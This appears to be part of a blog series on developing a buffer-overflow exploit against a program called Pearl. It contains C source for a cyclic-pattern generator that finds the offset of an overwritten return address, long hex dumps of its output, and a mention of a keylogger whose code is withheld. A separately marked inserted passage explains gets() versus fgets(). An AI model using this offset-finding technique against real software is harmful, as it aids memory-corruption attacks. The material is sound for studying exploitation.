Pearl — Hacking Apply — pt. IV

I had previously shown the buffer being filled with 0x41, but that doesn't help us locate any offset into the buffer. This will:

bazz@life[pts/2][~/latest] ./alternating_payload3 1600 > /tmp/sc
bazz@life[pts/2][~/latest] od2sc /tmp/sc
"\x01\x41\x41\x41\x01\x42\x42\x42\x01\x43\x43\x43\x01\x44\x44\x44"
"\x01\x45\x45\x45\x01\x46\x46\x46\x01\x47\x47\x47\x01\x48\x48\x48"
"\x01\x49\x49\x49\x01\x4a\x4a\x4a\x01\x4b\x4b\x4b\x01\x4c\x4c\x4c"
"\x01\x4d\x4d\x4d\x01\x4e\x4e\x4e\x01\x4f\x4f\x4f\x01\x50\x50\x50"
"\x01\x51\x51\x51\x01\x52\x52\x52\x01\x53\x53\x53\x01\x54\x54\x54"
"\x01\x55\x55\x55\x01\x56\x56\x56\x01\x57\x57\x57\x01\x58\x58\x58"
"\x01\x59\x59\x59\x01\x5a\x5a\x5a\x02\x41\x41\x41\x02\x42\x42\x42"
"\x02\x43\x43\x43\x02\x44\x44\x44\x02\x45\x45\x45\x02\x46\x46\x46"
"\x02\x47\x47\x47\x02\x48\x48\x48\x02\x49\x49\x49\x02\x4a\x4a\x4a"
"\x02\x4b\x4b\x4b\x02\x4c\x4c\x4c\x02\x4d\x4d\x4d\x02\x4e\x4e\x4e"
"\x02\x4f\x4f\x4f\x02\x50\x50\x50\x02\x51\x51\x51\x02\x52\x52\x52"
"\x02\x53\x53\x53\x02\x54\x54\x54\x02\x55\x55\x55\x02\x56\x56\x56"
"\x02\x57\x57\x57\x02\x58\x58\x58\x02\x59\x59\x59\x02\x5a\x5a\x5a"
"\x03\x41\x41\x41\x03\x42\x42\x42\x03\x43\x43\x43\x03\x44\x44\x44"
"\x03\x45\x45\x45\x03\x46\x46\x46\x03\x47\x47\x47\x03\x48\x48\x48"
"\x03\x49\x49\x49\x03\x4a\x4a\x4a\x03\x4b\x4b\x4b\x03\x4c\x4c\x4c"
"\x03\x4d\x4d\x4d\x03\x4e\x4e\x4e\x03\x4f\x4f\x4f\x03\x50\x50\x50"
"\x03\x51\x51\x51\x03\x52\x52\x52\x03\x53\x53\x53\x03\x54\x54\x54"
"\x03\x55\x55\x55\x03\x56\x56\x56\x03\x57\x57\x57\x03\x58\x58\x58"
"\x03\x59\x59\x59\x03\x5a\x5a\x5a\x04\x41\x41\x41\x04\x42\x42\x42"
"\x04\x43\x43\x43\x04\x44\x44\x44\x04\x45\x45\x45\x04\x46\x46\x46"
"\x04\x47\x47\x47\x04\x48\x48\x48\x04\x49\x49\x49\x04\x4a\x4a\x4a"
"\x04\x4b\x4b\x4b\x04\x4c\x4c\x4c\x04\x4d\x4d\x4d\x04\x4e\x4e\x4e"
"\x04\x4f\x4f\x4f\x04\x50\x50\x50\x04\x51\x51\x51\x04\x52\x52\x52"
"\x04\x53\x53\x53\x04\x54\x54\x54\x04\x55\x55\x55\x04\x56\x56\x56"
"\x04\x57\x57\x57\x04\x58\x58\x58\x04\x59\x59\x59\x04\x5a\x5a\x5a"
"\x05\x41\x41\x41\x05\x42\x42\x42\x05\x43\x43\x43\x05\x44\x44\x44"
"\x05\x45\x45\x45\x05\x46\x46\x46\x05\x47\x47\x47\x05\x48\x48\x48"
"\x05\x49\x49\x49\x05\x4a\x4a\x4a\x05\x4b\x4b\x4b\x05\x4c\x4c\x4c"
"\x05\x4d\x4d\x4d\x05\x4e\x4e\x4e\x05\x4f\x4f\x4f\x05\x50\x50\x50"
"\x05\x51\x51\x51\x05\x52\x52\x52\x05\x53\x53\x53\x05\x54\x54\x54"
"\x05\x55\x55\x55\x05\x56\x56\x56\x05\x57\x57\x57\x05\x58\x58\x58"
"\x05\x59\x59\x59\x05\x5a\x5a\x5a\x06\x41\x41\x41\x06\x42\x42\x42"
"\x06\x43\x43\x43\x06\x44\x44\x44\x06\x45\x45\x45\x06\x46\x46\x46"
"\x06\x47\x47\x47\x06\x48\x48\x48\x06\x49\x49\x49\x06\x4a\x4a\x4a"
"\x06\x4b\x4b\x4b\x06\x4c\x4c\x4c\x06\x4d\x4d\x4d\x06\x4e\x4e\x4e"
"\x06\x4f\x4f\x4f\x06\x50\x50\x50\x06\x51\x51\x51\x06\x52\x52\x52"
"\x06\x53\x53\x53\x06\x54\x54\x54\x06\x55\x55\x55\x06\x56\x56\x56"
"\x06\x57\x57\x57\x06\x58\x58\x58\x06\x59\x59\x59\x06\x5a\x5a\x5a"
"\x07\x41\x41\x41\x07\x42\x42\x42\x07\x43\x43\x43\x07\x44\x44\x44"
"\x07\x45\x45\x45\x07\x46\x46\x46\x07\x47\x47\x47\x07\x48\x48\x48"
"\x07\x49\x49\x49\x07\x4a\x4a\x4a\x07\x4b\x4b\x4b\x07\x4c\x4c\x4c"
"\x07\x4d\x4d\x4d\x07\x4e\x4e\x4e\x07\x4f\x4f\x4f\x07\x50\x50\x50"
"\x07\x51\x51\x51\x07\x52\x52\x52\x07\x53\x53\x53\x07\x54\x54\x54"
"\x07\x55\x55\x55\x07\x56\x56\x56\x07\x57\x57\x57\x07\x58\x58\x58"
"\x07\x59\x59\x59\x07\x5a\x5a\x5a\x08\x41\x41\x41\x08\x42\x42\x42"
"\x08\x43\x43\x43\x08\x44\x44\x44\x08\x45\x45\x45\x08\x46\x46\x46"
"\x08\x47\x47\x47\x08\x48\x48\x48\x08\x49\x49\x49\x08\x4a\x4a\x4a"
"\x08\x4b\x4b\x4b\x08\x4c\x4c\x4c\x08\x4d\x4d\x4d\x08\x4e\x4e\x4e"
"\x08\x4f\x4f\x4f\x08\x50\x50\x50\x08\x51\x51\x51\x08\x52\x52\x52"
"\x08\x53\x53\x53\x08\x54\x54\x54\x08\x55\x55\x55\x08\x56\x56\x56"
"\x08\x57\x57\x57\x08\x58\x58\x58\x08\x59\x59\x59\x08\x5a\x5a\x5a"
"\x09\x41\x41\x41\x09\x42\x42\x42\x09\x43\x43\x43\x09\x44\x44\x44"
"\x09\x45\x45\x45\x09\x46\x46\x46\x09\x47\x47\x47\x09\x48\x48\x48"
"\x09\x49\x49\x49\x09\x4a\x4a\x4a\x09\x4b\x4b\x4b\x09\x4c\x4c\x4c"
"\x09\x4d\x4d\x4d\x09\x4e\x4e\x4e\x09\x4f\x4f\x4f\x09\x50\x50\x50"
"\x09\x51\x51\x51\x09\x52\x52\x52\x09\x53\x53\x53\x09\x54\x54\x54"
"\x09\x55\x55\x55\x09\x56\x56\x56\x09\x57\x57\x57\x09\x58\x58\x58"
"\x09\x59\x59\x59\x09\x5a\x5a\x5a\x0a\x41\x41\x41\x0a\x42\x42\x42"
"\x0a\x43\x43\x43\x0a\x44\x44\x44\x0a\x45\x45\x45\x0a\x46\x46\x46"
"\x0a\x47\x47\x47\x0a\x48\x48\x48\x0a\x49\x49\x49\x0a\x4a\x4a\x4a"
"\x0a\x4b\x4b\x4b\x0a\x4c\x4c\x4c\x0a\x4d\x4d\x4d\x0a\x4e\x4e\x4e"
"\x0a\x4f\x4f\x4f\x0a\x50\x50\x50\x0a\x51\x51\x51\x0a\x52\x52\x52"
"\x0a\x53\x53\x53\x0a\x54\x54\x54\x0a\x55\x55\x55\x0a\x56\x56\x56"
"\x0a\x57\x57\x57\x0a\x58\x58\x58\x0a\x59\x59\x59\x0a\x5a\x5a\x5a"
"\x0b\x41\x41\x41\x0b\x42\x42\x42\x0b\x43\x43\x43\x0b\x44\x44\x44"
"\x0b\x45\x45\x45\x0b\x46\x46\x46\x0b\x47\x47\x47\x0b\x48\x48\x48"
"\x0b\x49\x49\x49\x0b\x4a\x4a\x4a\x0b\x4b\x4b\x4b\x0b\x4c\x4c\x4c"
"\x0b\x4d\x4d\x4d\x0b\x4e\x4e\x4e\x0b\x4f\x4f\x4f\x0b\x50\x50\x50"
"\x0b\x51\x51\x51\x0b\x52\x52\x52\x0b\x53\x53\x53\x0b\x54\x54\x54"
"\x0b\x55\x55\x55\x0b\x56\x56\x56\x0b\x57\x57\x57\x0b\x58\x58\x58"
"\x0b\x59\x59\x59\x0b\x5a\x5a\x5a\x0c\x41\x41\x41\x0c\x42\x42\x42"
"\x0c\x43\x43\x43\x0c\x44\x44\x44\x0c\x45\x45\x45\x0c\x46\x46\x46"
"\x0c\x47\x47\x47\x0c\x48\x48\x48\x0c\x49\x49\x49\x0c\x4a\x4a\x4a"
"\x0c\x4b\x4b\x4b\x0c\x4c\x4c\x4c\x0c\x4d\x4d\x4d\x0c\x4e\x4e\x4e"
"\x0c\x4f\x4f\x4f\x0c\x50\x50\x50\x0c\x51\x51\x51\x0c\x52\x52\x52"
"\x0c\x53\x53\x53\x0c\x54\x54\x54\x0c\x55\x55\x55\x0c\x56\x56\x56"
"\x0c\x57\x57\x57\x0c\x58\x58\x58\x0c\x59\x59\x59\x0c\x5a\x5a\x5a"
"\x0d\x41\x41\x41\x0d\x42\x42\x42\x0d\x43\x43\x43\x0d\x44\x44\x44"
"\x0d\x45\x45\x45\x0d\x46\x46\x46\x0d\x47\x47\x47\x0d\x48\x48\x48"
"\x0d\x49\x49\x49\x0d\x4a\x4a\x4a\x0d\x4b\x4b\x4b\x0d\x4c\x4c\x4c"
"\x0d\x4d\x4d\x4d\x0d\x4e\x4e\x4e\x0d\x4f\x4f\x4f\x0d\x50\x50\x50"
"\x0d\x51\x51\x51\x0d\x52\x52\x52\x0d\x53\x53\x53\x0d\x54\x54\x54"
"\x0d\x55\x55\x55\x0d\x56\x56\x56\x0d\x57\x57\x57\x0d\x58\x58\x58"
"\x0d\x59\x59\x59\x0d\x5a\x5a\x5a\x0e\x41\x41\x41\x0e\x42\x42\x42"
"\x0e\x43\x43\x43\x0e\x44\x44\x44\x0e\x45\x45\x45\x0e\x46\x46\x46"
"\x0e\x47\x47\x47\x0e\x48\x48\x48\x0e\x49\x49\x49\x0e\x4a\x4a\x4a"
"\x0e\x4b\x4b\x4b\x0e\x4c\x4c\x4c\x0e\x4d\x4d\x4d\x0e\x4e\x4e\x4e"
"\x0e\x4f\x4f\x4f\x0e\x50\x50\x50\x0e\x51\x51\x51\x0e\x52\x52\x52"
"\x0e\x53\x53\x53\x0e\x54\x54\x54\x0e\x55\x55\x55\x0e\x56\x56\x56"
"\x0e\x57\x57\x57\x0e\x58\x58\x58\x0e\x59\x59\x59\x0e\x5a\x5a\x5a"
"\x0f\x41\x41\x41\x0f\x42\x42\x42\x0f\x43\x43\x43\x0f\x44\x44\x44"
"\x0f\x45\x45\x45\x0f\x46\x46\x46\x0f\x47\x47\x47\x0f\x48\x48\x48"
"\x0f\x49\x49\x49\x0f\x4a\x4a\x4a\x0f\x4b\x4b\x4b\x0f\x4c\x4c\x4c"
"\x0f\x4d\x4d\x4d\x0f\x4e\x4e\x4e\x0f\x4f\x4f\x4f\x0f\x50\x50\x50"
"\x0f\x51\x51\x51\x0f\x52\x52\x52\x0f\x53\x53\x53\x0f\x54\x54\x54"
"\x0f\x55\x55\x55\x0f\x56\x56\x56\x0f\x57\x57\x57\x0f\x58\x58\x58"
"\x0f\x59\x59\x59\x0f\x5a\x5a\x5a\x10\x41\x41\x41\x10\x42\x42\x42"
"\x10\x43\x43\x43\x10\x44\x44\x44\x10\x45\x45\x45\x10\x46\x46\x46"
"\x10\x47\x47\x47\x10\x48\x48\x48\x10\x49\x49\x49\x10\x4a\x4a\x4a"

[[[hidden PTY code]]]

That code is stripped from an old version of a userspace keylogger I fabricated.

It wasn't working: no more buffer overflow. I realized that my alternating payload program did not take into account that gets() stops reading at 0x0a (newline), the way a string copy stops at the null byte, so I got to modifying it:
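To make the gets() point concrete, here is an added C example (not code from the post) that sizes what an unbounded gets()-style read would store from a constructed input, and compares it with what a bounded fgets() read into the same buffer actually stores. The function names (gets_style_store_size, would_overflow, fgets_store_len) and the sample inputs are my own; the bytes are staged through a tmpfile() stream so that fgets() can be driven without stdin.

```c
#include <stdio.h>
#include <string.h>

/* Bytes an unbounded gets()-style reader would store from in[0..n): everything
 * before the first 0x0a (gets() drops the newline itself) plus the terminating
 * NUL. Nothing is written here; the result is only compared against a capacity. */
size_t gets_style_store_size(const unsigned char *in, size_t n)
{
    const unsigned char *nl = memchr(in, 0x0a, n);
    size_t body = nl ? (size_t)(nl - in) : n;
    return body + 1;
}

/* Would a gets()-style read of in[0..n) write past a buffer of cap bytes? */
int would_overflow(const unsigned char *in, size_t n, size_t cap)
{
    return gets_style_store_size(in, n) > cap;
}

/* Bounded alternative: run the same bytes through fgets() into dst[cap].
 * fgets() also stops at the first 0x0a (keeping it), but never stores more
 * than cap-1 bytes plus NUL, so the write cannot exceed the buffer.
 * Returns the number of bytes stored, excluding the NUL, or -1 on error. */
long fgets_store_len(const unsigned char *in, size_t n, char *dst, size_t cap)
{
    FILE *f = tmpfile();          /* scratch stream standing in for stdin */
    long len = -1;

    if (f == NULL)
        return -1;
    if (fwrite(in, 1, n, f) == n) {
        rewind(f);
        if (fgets(dst, (int)cap, f) != NULL)
            len = (long)strlen(dst);
    }
    fclose(f);
    return len;
}

int main(void)
{
    /* constructed samples: a short line with an embedded newline, and a
     * 1600-byte newline-free input like the one the -g mode of the
     * generator below emits */
    static const unsigned char with_nl[] = "AAAA\nBBBBCCC";
    unsigned char no_nl[1600];
    char dst[256];

    memset(no_nl, 'A', sizeof no_nl);

    printf("0x0a at byte 4: gets() would store %zu bytes, fgets() stored %ld\n",
           gets_style_store_size(with_nl, 12),
           fgets_store_len(with_nl, 12, dst, sizeof dst));
    printf("1600 bytes, no 0x0a: gets() would store %zu bytes into %zu (overflow=%d), "
           "fgets() stored %ld\n",
           gets_style_store_size(no_nl, sizeof no_nl), sizeof dst,
           would_overflow(no_nl, sizeof no_nl, sizeof dst),
           fgets_store_len(no_nl, sizeof no_nl, dst, sizeof dst));
    return 0;
}
```

The first input shows the truncation the post ran into: the read ends at the newline, so nothing after it reaches the buffer. The second shows the two reads diverging on a newline-free input: the gets()-style size exceeds the 256-byte buffer, while fgets() stops at 255 bytes, which is the bounded read that removes the overflow.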

#include <stdio.h>
#include <stdlib.h>

// SPARC uses sys/inttypes.h
#ifdef __sun
  #include <sys/inttypes.h>
#else
  #include <stdint.h>
#endif

// this form provides buffer experimentation foundation
// buffer will be created up to numbytes desired, but < MAX, specified
// on the command line argument
// form: 0x[01-ff][41-5a][41-5a][41-5a]

// 0x41-0x5a range is chars 'A' to 'Z'
// An extended range < 'A' to > 'Z' could modify this program to extend
// the MAX length of the buffer

#define CHAR_RANGE (('Z'-'A')+1)  // 'Z' - 'A' is 25, but we know
// there are 26 letters in the alphabet. I call this inclusive subtraction,
// when I add 1 to get the real desired value. There is also inclusive
// addition I think. I'm using terms I created.
// little proof program to figure this out
/*

#include <stdio.h>

// Conclusion: Inclusive Subtraction requires add 1

int main()
{
  printf("Derp Face, I'm ready :) \n");
  printf("'Z' - 'A' = %d", ('Z'-'A')+1);

  return 0;
}

*/

#define MAX (CHAR_RANGE * 255 * 4)
// Arbitrary MAX that is derived from the following formula:
// 26a * 255b * 4c
// a [letters of the alphabet]
// b [ byte field width excluding 0 (null byte)]
// c [ 4 bytes per entry ie. 0x01414141 ]

#define RANGE (26*4)   // bytes emitted per prefix byte: 26 entries of 4 bytes

unsigned long arg, numbytes, smashval;
char no_nl = 0;        // set by -g: never emit 0x0a, which gets() treats as end of input


// does the following operation to get the offset:
// [(msb - 1) * 26] + (lsb - 0x41), then * 4 for the entry width
unsigned long getSmashOffset(const unsigned long *smashval)
{
  uint32_t msb, lsb;

  msb = ( *smashval >> 24 ) & 0xff;
  lsb = *smashval & 0xff;

  msb--;
  // with -g the generator skipped prefix 0x0a, so every prefix from 0x0b
  // upward sits one group earlier than its value suggests (after the
  // decrement above, 0x0b has become 0x0a, hence >=)
  if (no_nl && msb >= 0x0a) msb--;
  msb *= 26;
  lsb -= 0x41;

  return (msb+lsb)*4;
}


// parse [-g] numbytes|smashed-stack-val; leaves *argv pointing at the number
int processclargs(int argc, char *argv[])
{
  int c;

  while( --argc > 0 && (*++argv)[0] == '-')
  {
    while( (c = *++argv[0]) != '\0' )   // walk the option letters of this argument
    {
      switch (c)
      {
        case 'g':   // gets() target must not have 0x0a in payload
          fprintf(stderr,"-g detected, assuming interactive target");
          no_nl=1;
          break;
        default:
          fprintf(stderr, "illegal option -%c\n", c);
          exit(2);
      }
    }
  }

  if (argc < 1)
  {
    fprintf(stderr, "missing numbytes|smashed-stack-val argument\n");
    exit(2);
  }

  arg = numbytes = strtoul( *argv, (void *)0, 0 );
  fprintf (stderr, "numbytes = %lu\n", numbytes);

  return 0;
}


int main(int argc, char **argv)
{
  unsigned char a, c;
  unsigned long i;
  int rc=0;

  if (argc < 2)
  {
    printf ("You're doing it wrong! \n");
    printf ("Usage: %s [-g] [numbytes <= %d]|[smashed-stack-val]\n", argv[0], MAX);
    exit (1);
  }

  processclargs(argc,argv);

  if (arg > MAX)
  {
    if (arg < 0x01414141)
    {
      printf ("You can't have an overflow amount > %d\n", MAX);
      exit(2);
    }
    else
    {
      // argument is a smashed register value: print its offset into the payload
      printf ("%lu\n", getSmashOffset(&arg));
      return 0;
    }
  }

  // emit entries of the form [prefix][letter][letter][letter]
  for (a=0x40, i=0, c=1; i < numbytes; i++)
  {
    if (i%4 == 0)
    {
      printf("%c", c);      // prefix byte
      a++;                  // next letter for the remaining three bytes
      if (a == 'Z'+1)
        a = 0x41;
    }
    else
      printf("%c",a);
    rc ++;
    if (rc == RANGE)        // 26 entries done: advance the prefix byte
    {
      rc=0; c++;
      if (!c)               // never emit 0x00 (string terminator)
        c++;
      else if (c == 0x0a && no_nl)
        c++;                // never emit 0x0a for a gets() target
    }
  }
  return 0;
}

I inspect the new invocation to confirm it works correctly:

bazz@life[pts/2][~/latest] ./alternating_payload3 -g 1600 | od -X
-g detected, assuming interactive targetnumbytes = 1600
0000000 01414141 01424242 01434343 01444444
0000020 01454545 01464646 01474747 01484848
0000040 01494949 014a4a4a 014b4b4b 014c4c4c
0000060 014d4d4d 014e4e4e 014f4f4f 01505050
0000100 01515151 01525252 01535353 01545454
0000120 01555555 01565656 01575757 01585858
0000140 01595959 015a5a5a 02414141 02424242
0000160 02434343 02444444 02454545 02464646
0000200 02474747 02484848 02494949 024a4a4a
0000220 024b4b4b 024c4c4c 024d4d4d 024e4e4e
0000240 024f4f4f 02505050 02515151 02525252
0000260 02535353 02545454 02555555 02565656
0000300 02575757 02585858 02595959 025a5a5a
0000320 03414141 03424242 03434343 03444444
0000340 03454545 03464646 03474747 03484848
0000360 03494949 034a4a4a 034b4b4b 034c4c4c
0000400 034d4d4d 034e4e4e 034f4f4f 03505050
0000420 03515151 03525252 03535353 03545454
0000440 03555555 03565656 03575757 03585858
0000460 03595959 035a5a5a 04414141 04424242
0000500 04434343 04444444 04454545 04464646
0000520 04474747 04484848 04494949 044a4a4a
0000540 044b4b4b 044c4c4c 044d4d4d 044e4e4e
0000560 044f4f4f 04505050 04515151 04525252
0000600 04535353 04545454 04555555 04565656
0000620 04575757 04585858 04595959 045a5a5a
0000640 05414141 05424242 05434343 05444444
0000660 05454545 05464646 05474747 05484848
0000700 05494949 054a4a4a 054b4b4b 054c4c4c
0000720 054d4d4d 054e4e4e 054f4f4f 05505050
0000740 05515151 05525252 05535353 05545454
0000760 05555555 05565656 05575757 05585858
0001000 05595959 055a5a5a 06414141 06424242
0001020 06434343 06444444 06454545 06464646
0001040 06474747 06484848 06494949 064a4a4a
0001060 064b4b4b 064c4c4c 064d4d4d 064e4e4e
0001100 064f4f4f 06505050 06515151 06525252
0001120 06535353 06545454 06555555 06565656
0001140 06575757 06585858 06595959 065a5a5a
0001160 07414141 07424242 07434343 07444444
0001200 07454545 07464646 07474747 07484848
0001220 07494949 074a4a4a 074b4b4b 074c4c4c
0001240 074d4d4d 074e4e4e 074f4f4f 07505050
0001260 07515151 07525252 07535353 07545454
0001300 07555555 07565656 07575757 07585858
0001320 07595959 075a5a5a 08414141 08424242
0001340 08434343 08444444 08454545 08464646
0001360 08474747 08484848 08494949 084a4a4a
0001400 084b4b4b 084c4c4c 084d4d4d 084e4e4e
0001420 084f4f4f 08505050 08515151 08525252
0001440 08535353 08545454 08555555 08565656
0001460 08575757 08585858 08595959 085a5a5a
0001500 09414141 09424242 09434343 09444444
0001520 09454545 09464646 09474747 09484848
0001540 09494949 094a4a4a 094b4b4b 094c4c4c
0001560 094d4d4d 094e4e4e 094f4f4f 09505050
0001600 09515151 09525252 09535353 09545454
0001620 09555555 09565656 09575757 09585858
0001640 09595959 095a5a5a 0b414141 0b424242
0001660 0b434343 0b444444 0b454545 0b464646
0001700 0b474747 0b484848 0b494949 0b4a4a4a
0001720 0b4b4b4b 0b4c4c4c 0b4d4d4d 0b4e4e4e
0001740 0b4f4f4f 0b505050 0b515151 0b525252
0001760 0b535353 0b545454 0b555555 0b565656
0002000 0b575757 0b585858 0b595959 0b5a5a5a
0002020 0c414141 0c424242 0c434343 0c444444
0002040 0c454545 0c464646 0c474747 0c484848
0002060 0c494949 0c4a4a4a 0c4b4b4b 0c4c4c4c
0002100 0c4d4d4d 0c4e4e4e 0c4f4f4f 0c505050
0002120 0c515151 0c525252 0c535353 0c545454
0002140 0c555555 0c565656 0c575757 0c585858
0002160 0c595959 0c5a5a5a 0d414141 0d424242
0002200 0d434343 0d444444 0d454545 0d464646
0002220 0d474747 0d484848 0d494949 0d4a4a4a
0002240 0d4b4b4b 0d4c4c4c 0d4d4d4d 0d4e4e4e
0002260 0d4f4f4f 0d505050 0d515151 0d525252
0002300 0d535353 0d545454 0d555555 0d565656
0002320 0d575757 0d585858 0d595959 0d5a5a5a
0002340 0e414141 0e424242 0e434343 0e444444
0002360 0e454545 0e464646 0e474747 0e484848
0002400 0e494949 0e4a4a4a 0e4b4b4b 0e4c4c4c
0002420 0e4d4d4d 0e4e4e4e 0e4f4f4f 0e505050
0002440 0e515151 0e525252 0e535353 0e545454
0002460 0e555555 0e565656 0e575757 0e585858
0002500 0e595959 0e5a5a5a 0f414141 0f424242
0002520 0f434343 0f444444 0f454545 0f464646
0002540 0f474747 0f484848 0f494949 0f4a4a4a
0002560 0f4b4b4b 0f4c4c4c 0f4d4d4d 0f4e4e4e
0002600 0f4f4f4f 0f505050 0f515151 0f525252
0002620 0f535353 0f545454 0f555555 0f565656
0002640 0f575757 0f585858 0f595959 0f5a5a5a
0002660 10414141 10424242 10434343 10444444
0002700 10454545 10464646 10474747 10484848
0002720 10494949 104a4a4a 104b4b4b 104c4c4c
0002740 104d4d4d 104e4e4e 104f4f4f 10505050
0002760 10515151 10525252 10535353 10545454
0003000 10555555 10565656 10575757 10585858
0003020 10595959 105a5a5a 11414141 11424242
0003040 11434343 11444444 11454545 11464646
0003060 11474747 11484848 11494949 114a4a4a
0003100

Notice that the 0x0a prefix byte is skipped: 0x09 is followed directly by 0x0b.

bazz@life[pts/2][~/latest] ./alternating_payload3 -g 1600 > /tmp/X; od2sc /tmp/X
-g detected, assuming interactive targetnumbytes = 1600
"\x01\x41\x41\x41\x01\x42\x42\x42\x01\x43\x43\x43\x01\x44\x44\x44"
"\x01\x45\x45\x45\x01\x46\x46\x46\x01\x47\x47\x47\x01\x48\x48\x48"
"\x01\x49\x49\x49\x01\x4a\x4a\x4a\x01\x4b\x4b\x4b\x01\x4c\x4c\x4c"
"\x01\x4d\x4d\x4d\x01\x4e\x4e\x4e\x01\x4f\x4f\x4f\x01\x50\x50\x50"
"\x01\x51\x51\x51\x01\x52\x52\x52\x01\x53\x53\x53\x01\x54\x54\x54"
"\x01\x55\x55\x55\x01\x56\x56\x56\x01\x57\x57\x57\x01\x58\x58\x58"
"\x01\x59\x59\x59\x01\x5a\x5a\x5a\x02\x41\x41\x41\x02\x42\x42\x42"
"\x02\x43\x43\x43\x02\x44\x44\x44\x02\x45\x45\x45\x02\x46\x46\x46"
"\x02\x47\x47\x47\x02\x48\x48\x48\x02\x49\x49\x49\x02\x4a\x4a\x4a"
"\x02\x4b\x4b\x4b\x02\x4c\x4c\x4c\x02\x4d\x4d\x4d\x02\x4e\x4e\x4e"
"\x02\x4f\x4f\x4f\x02\x50\x50\x50\x02\x51\x51\x51\x02\x52\x52\x52"
"\x02\x53\x53\x53\x02\x54\x54\x54\x02\x55\x55\x55\x02\x56\x56\x56"
"\x02\x57\x57\x57\x02\x58\x58\x58\x02\x59\x59\x59\x02\x5a\x5a\x5a"
"\x03\x41\x41\x41\x03\x42\x42\x42\x03\x43\x43\x43\x03\x44\x44\x44"
"\x03\x45\x45\x45\x03\x46\x46\x46\x03\x47\x47\x47\x03\x48\x48\x48"
"\x03\x49\x49\x49\x03\x4a\x4a\x4a\x03\x4b\x4b\x4b\x03\x4c\x4c\x4c"
"\x03\x4d\x4d\x4d\x03\x4e\x4e\x4e\x03\x4f\x4f\x4f\x03\x50\x50\x50"
"\x03\x51\x51\x51\x03\x52\x52\x52\x03\x53\x53\x53\x03\x54\x54\x54"
"\x03\x55\x55\x55\x03\x56\x56\x56\x03\x57\x57\x57\x03\x58\x58\x58"
"\x03\x59\x59\x59\x03\x5a\x5a\x5a\x04\x41\x41\x41\x04\x42\x42\x42"
"\x04\x43\x43\x43\x04\x44\x44\x44\x04\x45\x45\x45\x04\x46\x46\x46"
"\x04\x47\x47\x47\x04\x48\x48\x48\x04\x49\x49\x49\x04\x4a\x4a\x4a"
"\x04\x4b\x4b\x4b\x04\x4c\x4c\x4c\x04\x4d\x4d\x4d\x04\x4e\x4e\x4e"
"\x04\x4f\x4f\x4f\x04\x50\x50\x50\x04\x51\x51\x51\x04\x52\x52\x52"
"\x04\x53\x53\x53\x04\x54\x54\x54\x04\x55\x55\x55\x04\x56\x56\x56"
"\x04\x57\x57\x57\x04\x58\x58\x58\x04\x59\x59\x59\x04\x5a\x5a\x5a"
"\x05\x41\x41\x41\x05\x42\x42\x42\x05\x43\x43\x43\x05\x44\x44\x44"
"\x05\x45\x45\x45\x05\x46\x46\x46\x05\x47\x47\x47\x05\x48\x48\x48"
"\x05\x49\x49\x49\x05\x4a\x4a\x4a\x05\x4b\x4b\x4b\x05\x4c\x4c\x4c"
"\x05\x4d\x4d\x4d\x05\x4e\x4e\x4e\x05\x4f\x4f\x4f\x05\x50\x50\x50"
"\x05\x51\x51\x51\x05\x52\x52\x52\x05\x53\x53\x53\x05\x54\x54\x54"
"\x05\x55\x55\x55\x05\x56\x56\x56\x05\x57\x57\x57\x05\x58\x58\x58"
"\x05\x59\x59\x59\x05\x5a\x5a\x5a\x06\x41\x41\x41\x06\x42\x42\x42"
"\x06\x43\x43\x43\x06\x44\x44\x44\x06\x45\x45\x45\x06\x46\x46\x46"
"\x06\x47\x47\x47\x06\x48\x48\x48\x06\x49\x49\x49\x06\x4a\x4a\x4a"
"\x06\x4b\x4b\x4b\x06\x4c\x4c\x4c\x06\x4d\x4d\x4d\x06\x4e\x4e\x4e"
"\x06\x4f\x4f\x4f\x06\x50\x50\x50\x06\x51\x51\x51\x06\x52\x52\x52"
"\x06\x53\x53\x53\x06\x54\x54\x54\x06\x55\x55\x55\x06\x56\x56\x56"
"\x06\x57\x57\x57\x06\x58\x58\x58\x06\x59\x59\x59\x06\x5a\x5a\x5a"
"\x07\x41\x41\x41\x07\x42\x42\x42\x07\x43\x43\x43\x07\x44\x44\x44"
"\x07\x45\x45\x45\x07\x46\x46\x46\x07\x47\x47\x47\x07\x48\x48\x48"
"\x07\x49\x49\x49\x07\x4a\x4a\x4a\x07\x4b\x4b\x4b\x07\x4c\x4c\x4c"
"\x07\x4d\x4d\x4d\x07\x4e\x4e\x4e\x07\x4f\x4f\x4f\x07\x50\x50\x50"
"\x07\x51\x51\x51\x07\x52\x52\x52\x07\x53\x53\x53\x07\x54\x54\x54"
"\x07\x55\x55\x55\x07\x56\x56\x56\x07\x57\x57\x57\x07\x58\x58\x58"
"\x07\x59\x59\x59\x07\x5a\x5a\x5a\x08\x41\x41\x41\x08\x42\x42\x42"
"\x08\x43\x43\x43\x08\x44\x44\x44\x08\x45\x45\x45\x08\x46\x46\x46"
"\x08\x47\x47\x47\x08\x48\x48\x48\x08\x49\x49\x49\x08\x4a\x4a\x4a"
"\x08\x4b\x4b\x4b\x08\x4c\x4c\x4c\x08\x4d\x4d\x4d\x08\x4e\x4e\x4e"
"\x08\x4f\x4f\x4f\x08\x50\x50\x50\x08\x51\x51\x51\x08\x52\x52\x52"
"\x08\x53\x53\x53\x08\x54\x54\x54\x08\x55\x55\x55\x08\x56\x56\x56"
"\x08\x57\x57\x57\x08\x58\x58\x58\x08\x59\x59\x59\x08\x5a\x5a\x5a"
"\x09\x41\x41\x41\x09\x42\x42\x42\x09\x43\x43\x43\x09\x44\x44\x44"
"\x09\x45\x45\x45\x09\x46\x46\x46\x09\x47\x47\x47\x09\x48\x48\x48"
"\x09\x49\x49\x49\x09\x4a\x4a\x4a\x09\x4b\x4b\x4b\x09\x4c\x4c\x4c"
"\x09\x4d\x4d\x4d\x09\x4e\x4e\x4e\x09\x4f\x4f\x4f\x09\x50\x50\x50"
"\x09\x51\x51\x51\x09\x52\x52\x52\x09\x53\x53\x53\x09\x54\x54\x54"
"\x09\x55\x55\x55\x09\x56\x56\x56\x09\x57\x57\x57\x09\x58\x58\x58"
"\x09\x59\x59\x59\x09\x5a\x5a\x5a\x0b\x41\x41\x41\x0b\x42\x42\x42"
"\x0b\x43\x43\x43\x0b\x44\x44\x44\x0b\x45\x45\x45\x0b\x46\x46\x46"
"\x0b\x47\x47\x47\x0b\x48\x48\x48\x0b\x49\x49\x49\x0b\x4a\x4a\x4a"
"\x0b\x4b\x4b\x4b\x0b\x4c\x4c\x4c\x0b\x4d\x4d\x4d\x0b\x4e\x4e\x4e"
"\x0b\x4f\x4f\x4f\x0b\x50\x50\x50\x0b\x51\x51\x51\x0b\x52\x52\x52"
